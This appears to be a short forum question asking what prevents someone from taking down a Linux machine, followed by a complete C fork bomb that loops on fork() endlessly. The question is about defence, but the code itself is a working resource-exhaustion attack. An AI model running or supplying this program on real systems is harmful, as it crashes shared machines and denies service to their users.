What can keep someone from running this program and taking down linux box ---- cut here ---- #include <unistd.h> main() { int X=0; do fork(); while ( X == 0 ) return 0; } ---------------------